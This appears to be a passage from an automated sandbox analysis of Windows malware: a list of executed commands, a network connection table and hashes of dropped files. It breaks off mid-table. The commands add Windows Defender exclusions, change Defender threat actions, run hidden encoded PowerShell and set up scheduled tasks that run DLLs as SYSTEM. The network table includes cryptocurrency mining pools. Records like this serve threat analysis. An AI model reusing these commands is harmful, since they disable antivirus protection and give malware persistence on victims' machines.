"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QVWjqfQytQiLC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QVWjqfQytQiLC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XPXpeEiKDyUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XPXpeEiKDyUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dEiqbvzNTqQVhmXUeQR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dEiqbvzNTqQVhmXUeQR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dSFCGoajU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dSFCGoajU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yPeEHKRKYSIU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yPeEHKRKYSIU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LIlQlxhqsAqlQuVB" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LIlQlxhqsAqlQuVB" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gwJyCdkkF" /SC once /ST 17:20:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gwJyCdkkF"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gwJyCdkkF"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZeWKVsXrVUhETallN" /SC once /ST 00:00:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe\" xE /gkhFdidZo 385134 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ZeWKVsXrVUhETallN"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 356
C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe
C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe xE /gkhFdidZo 385134 /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bRfJDuKmNsszhfPRJj"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dSFCGoajU\uTzZvi.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "IKgJWbxobPFnKRD" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "IKgJWbxobPFnKRD2" /F /xml "C:\Program Files (x86)\dSFCGoajU\LXzExIm.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "IKgJWbxobPFnKRD"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "IKgJWbxobPFnKRD"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "akoOFLrBRTPCbU" /F /xml "C:\Program Files (x86)\yPeEHKRKYSIU2\urxfMww.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "wfFQcQKlkPPWv2" /F /xml "C:\ProgramData\LIlQlxhqsAqlQuVB\hQLYTGq.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "vxcqWRmGqrEtvyfOY2" /F /xml "C:\Program Files (x86)\dEiqbvzNTqQVhmXUeQR\SsyAlBr.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "YEGcRNQFZnwPGhngIoG2" /F /xml "C:\Program Files (x86)\QVWjqfQytQiLC\FvNvEsx.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "igQCsPejxzPEidhrw" /SC once /ST 21:38:11 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\cksoItPsQhGrxIuH\AdCeSfEP\rhUGYgS.dll\",#1 /jdidybFi 385134" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "igQCsPejxzPEidhrw"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\cksoItPsQhGrxIuH\AdCeSfEP\rhUGYgS.dll",#1 /jdidybFi 385134
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\cksoItPsQhGrxIuH\AdCeSfEP\rhUGYgS.dll",#1 /jdidybFi 385134
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2916 -s 632
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZeWKVsXrVUhETallN"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 1556
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "igQCsPejxzPEidhrw"
Network
| Country | Destination | Domain | Proto |
| DE | 185.172.128.116:80 | 185.172.128.116 | tcp |
| DE | 185.172.128.116:80 | 185.172.128.116 | tcp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| NL | 23.63.101.171:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | a.438574893.xyz | udp |
| US | 95.164.7.40:443 | a.438574893.xyz | tcp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 8.8.8.8:53 | greendag.ru | udp |
| US | 8.8.8.8:53 | osdhs.in.ne | udp |
| US | 8.8.8.8:53 | jkshb.su | udp |
| AR | 190.220.21.28:80 | jkshb.su | tcp |
| AR | 190.220.21.28:80 | jkshb.su | tcp |
| AR | 190.220.21.28:80 | jkshb.su | tcp |
| US | 8.8.8.8:53 | greendag.ru | udp |
| US | 8.8.8.8:53 | greendag.ru | udp |
| US | 8.8.8.8:53 | zeph-eu2.nanopool.org | udp |
| FR | 51.210.150.92:10943 | zeph-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| DE | 162.19.224.121:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | api4.check-data.xyz | udp |
| US | 44.237.26.169:80 | api4.check-data.xyz | tcp |
| DE | 185.172.128.116:80 | 185.172.128.116 | tcp |
| AR | 190.220.21.28:80 | jkshb.su | tcp |
| AR | 190.220.21.28:80 | jkshb.su | tcp |
| US | 8.8.8.8:53 | osdhs.in.ne | udp |
| US | 8.8.8.8:53 | greendag.ru | udp |
| US | 8.8.8.8:53 | greendag.ru | udp |
| AR | 190.220.21.28:80 | jkshb.su | tcp |
| US | 8.8.8.8:53 | greendag.ru | udp |
Files
memory/1312-1-0x0000000000900000-0x0000000000901000-memory.dmp
\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe
| MD5 | 993609639c915d36f2821bad869a17d4 |
| SHA1 | 899988523cc0bde90c28889a5e32b273757915ac |
| SHA256 | fa6aa0dd992228ace8364ddfe1df64c539ee82217fe36710e5882f62dc9868d7 |
| SHA512 | 147b9272265b9a5edea8b1f54b37dd95e8380ba461233bb476612ff48016ae752b2cbfa31d3bf87a6f404469eae6c90392c652f19720b4531b78e648b7b58f32 |
C:\Users\Admin\AppData\Local\Temp\1000003001\b2c2c1.exe
| MD5 | f8ec725e4b969f157fd70166e73a56a3 |
| SHA1 | 8bc092817245f2727154454e0011a8d6704e2eb7 |
| SHA256 | eb74efaf4832a80809815051fc97704819fbc4b1d57f07faf39746a02ed1dd10 |
| SHA512 | 7dc3acb485263fd616ea84999a897f0e298f21485a34457697c523a095083d7de599b3cfc4bc3d45a5d36bc374a3a5e8778646dfa97c447d4be710021678e040 |
C:\Users\Admin\AppData\Local\Temp\816782303773
| MD5 | 090c84ea27566e9f20a21e8a2dd0d8fc |
| SHA1 | 0b9d141922d64815254564a2f727b3f9033d0975 |
| SHA256 | 97fb65f038b2959990f79ea99de75009bd2b910b55d458aeb14460ed889b95a1 |
| SHA512 | ea540276bc1f103a56bfc19e5428b2ca56ab80bb164e0778260d5971914b1fa31dbb6782f560080d0e04e4fb6bd9e35259b858f84e9d0ed43b7d196bdd7ac79a |
C:\Users\Admin\AppData\Local\Temp\1000005001\setup.exe
| MD5 | 029f9cf6a360655b4f842ab09f7e8b19 |
| SHA1 | 72ff1a5a48ffb1f65087bcb88092f5eba5ba2cdf |
| SHA256 | 03276e966641816f4bc397cbd5d464d0f415c5113c16e7516ad186f2fcf3ce45 |
| SHA512 | 084e8831b94739c6e0432f2b017f06b5ad16d694676d2bd56dfeffb01b54a2cff408ed00836c39b535d35520371b78cadbfc8594cabbb572987e3b608845e3a3 |
C:\Users\Admin\AppData\Local\Temp\1000006001\FirstZ.exe
| MD5 | ffada57f998ed6a72b6ba2f072d2690a |
| SHA1 | 6857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f |
| SHA256 | 677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12 |
| SHA512 | 1de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f |
\Users\Admin\AppData\Local\Temp\7zS2971.tmp\Install.exe
| MD5 | 65f2a189d876fa0ab9a69b7b7d8ec22d |
| SHA1 | fae918d3ade21c6072184cec61961c036eac446e |
| SHA256 | d1e9e00027b343f1f60733a993a46161fc62993940b70db3e95e2e2fbd3c36b0 |
| SHA512 | fb01fa38a5be5df935b5a82270f801676f5b0da1ef7150df86a2cf7151f6a4976fd0155ad4693be3e6cf577f6017d2759da272991789c3d185eceb94fdf75766 |
\Users\Admin\AppData\Local\Temp\7zS2EBE.tmp\Install.exe
| MD5 | 6d62f544d3de937435c07ca2e4c45751 |
| SHA1 | dd4653f37aa30f1896f84f1b99f850f0487a3e1d |
| SHA256 | 32a68fcef6732b985c31755e25d5410ebf23e61d1197114c3c74eba0ab2e2075 |
| SHA512 | eaddce56d9ba57cdd99caaa4041eb4c31b93f2c3a657fb7897deb3f45bb984fcf3d0b658772ab2265f6a27fbc5680ff9a1facf1a351b16608c8f8eb58f94cefb |
memory/1200-109-0x0000000002350000-0x00000000029FF000-memory.dmp
memory/1036-110-0x0000000000830000-0x0000000000EDF000-memory.dmp
memory/1036-111-0x00000000014D0000-0x0000000001B7F000-memory.dmp
memory/1036-112-0x00000000014D0000-0x0000000001B7F000-memory.dmp
memory/1036-113-0x00000000014D0000-0x0000000001B7F000-memory.dmp
\Users\Admin\AppData\Local\Temp\1000009001\setup.exe
| MD5 | 08dcde2b36c71bf79faff5c2ca1c767e |
| SHA1 | 1c7de80f54045b58f60778c0c67a9d1285856264 |
| SHA256 | 682553ceb58f736fc66b56349335e94020e6728f4de14d5293e023978c769707 |
| SHA512 | 58c3f1bf07ea6a5024b4f0673e8a694c0d4c8bb6b0009383183407f735238bbbf3b5efe90ede5eb2fffeca4bfff7ed7c39f5211421edf9b591397e90c423b88b |
\Users\Admin\AppData\Local\Temp\7zS3997.tmp\Install.exe
| MD5 | e5b57b5edd9daf7f9e14ec517e717226 |
| SHA1 | b05ec3a832cc9edc05cc2de555f226394b62f39b |
| SHA256 | ca490b39a255ec3ba6c2764b7dae365c9643ebf91c9c1cc858930a95f04a0293 |
| SHA512 | 852a878cc1fb6d3e3a99f847ac63406e86081548462fcfda2f9dd83ddb654b946b3314e94eeb576b7de1b4b1a899e8bb98f69904899df7b9b1b140b846c1c891 |
memory/2916-155-0x0000000001170000-0x000000000181F000-memory.dmp
memory/2916-156-0x0000000001170000-0x000000000181F000-memory.dmp
memory/2916-154-0x0000000000340000-0x00000000009EF000-memory.dmp
memory/2112-149-0x0000000002360000-0x0000000002A0F000-memory.dmp
memory/2916-157-0x0000000001170000-0x000000000181F000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8EH38Y654ABM8B3FYMJ8.temp
| MD5 | ff03ddafdf88580561db25752408c82b |
| SHA1 | 8f861d34f95760655e6cf56f1c25b5a7378c144d |
| SHA256 | c6b72536f2740395ea131ecd1663225c71809f9e704f2699eecb85c2f657044a |
| SHA512 | 5cf5c34081d868890b8886a6e8517ccf27c694a03f5107baaac9facf46c20f6284e252a93dca272996785e38bfccdf5cd253fa3ec0b77705939653a104f388bd |
memory/2696-178-0x0000000000400000-0x0000000000481000-memory.dmp
memory/1036-180-0x0000000010000000-0x00000000105EC000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2916-190-0x0000000010000000-0x00000000105EC000-memory.dmp
C:\Windows\Tasks\bRfJDuKmNsszhfPRJj.job
| MD5 | 4386acbc04557ab7ec565510419db51d |
| SHA1 | 41e73a984b9b693d18c218170b14129813bd59d6 |
| SHA256 | dbec172f5eb87d28e252e3cc92c567fd4dd2cb8dd8749159118f74e82098e7a7 |
| SHA512 | 76f24ed61f1975ce3a0f87a61959bf07b43bfc69ed8766c700c55876d2b35543d4dc5052ca5b314833877aa1a521012a8a845911a3788f3a57ab7ef9bc954aa5 |
memory/1516-210-0x0000000000400000-0x0000000000481000-memory.dmp
memory/1200-211-0x0000000002350000-0x00000000029FF000-memory.dmp
memory/1036-216-0x0000000000830000-0x0000000000EDF000-memory.dmp
memory/1036-217-0x00000000014D0000-0x0000000001B7F000-memory.dmp
memory/1036-218-0x00000000014D0000-0x0000000001B7F000-memory.dmp
memory/2916-219-0x0000000000340000-0x00000000009EF000-memory.dmp
memory/1516-220-0x0000000000400000-0x0000000000481000-memory.dmp
memory/1316-229-0x000000001B520000-0x000000001B802000-memory.dmp
memory/1316-230-0x0000000002260000-0x0000000002268000-memory.dmp
memory/2688-239-0x0000000019F20000-0x000000001A202000-memory.dmp
memory/2688-240-0x0000000000950000-0x0000000000958000-memory.dmp
memory/2336-244-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2336-245-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2336-243-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2800-250-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2800-257-0x0000000000130000-0x0000000000150000-memory.dmp
memory/2800-255-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2800-261-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2800-262-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2800-260-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2800-259-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2800-258-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2800-256-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1516-263-0x0000000000400000-0x0000000000481000-memory.dmp
memory/2800-253-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2800-252-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2800-254-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2800-251-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2336-248-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2336-242-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2336-241-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2800-264-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2800-265-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1088-268-0x0000000000D50000-0x00000000013FF000-memory.dmp
memory/1088-270-0x0000000010000000-0x00000000105EC000-memory.dmp
memory/1088-289-0x0000000000D50000-0x00000000013FF000-memory.dmp
memory/1088-304-0x0000000000D50000-0x00000000013FF000-memory.dmp
memory/2280-305-0x0000000000090000-0x000000000073F000-memory.dmp
memory/2280-306-0x0000000010000000-0x00000000105EC000-memory.dmp
memory/2280-318-0x0000000001AD0000-0x0000000001B55000-memory.dmp
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | d25ef11737dc7bacbb54d4f16c63d0a7 |
| SHA1 | 4c96503288df2273997e5f2c2eef1427cbbb77ec |
| SHA256 | 131f0038557d33b7a33e4462cbc8753a9730f6fee2039f096dc59922b8961059 |
| SHA512 | ed2702ec6bbebe1434d8da63fdab23bd30c5490c27613bf360e70e9769f88a161ed6e8ab6947e226001ef673858a5f9a25bb8838e1b71e8e4c89b07ccba5f9b7 |
memory/2280-352-0x00000000013D0000-0x0000000001439000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
